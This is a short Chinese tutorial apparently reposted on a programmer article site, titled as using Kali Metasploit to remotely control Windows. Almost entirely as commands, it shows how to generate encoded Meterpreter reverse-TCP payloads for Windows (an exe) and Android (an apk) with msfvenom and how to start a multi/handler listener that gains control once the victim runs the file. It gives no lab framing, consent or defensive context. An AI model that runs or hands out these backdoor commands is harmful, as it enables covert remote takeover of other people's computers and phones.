kali metasploit 远程控制Windows
程序员文章站
2022-07-15 14:03:55
...
一、在kali中生成被控制端程序
aaa@qq.com:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R > /root/apk.apk #生成安卓端
将生成的文件放置在Windows或安卓手机上。
二、在kali中启动主控制端
输入 msfconsole命令
在Metasploit中使用handler作为主动端,启动命令如下。
use exploit/multi/handler
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
设置LHOST和LPORT
set lhost 192.168.88.188
set lport 5901
执行 exploit 开启监听
exploit
Windows端执行 test.exe
远程连接成功。安卓也是同样的方式。
上一篇: CentOS6安装JDK
下一篇: css33d摩天轮动画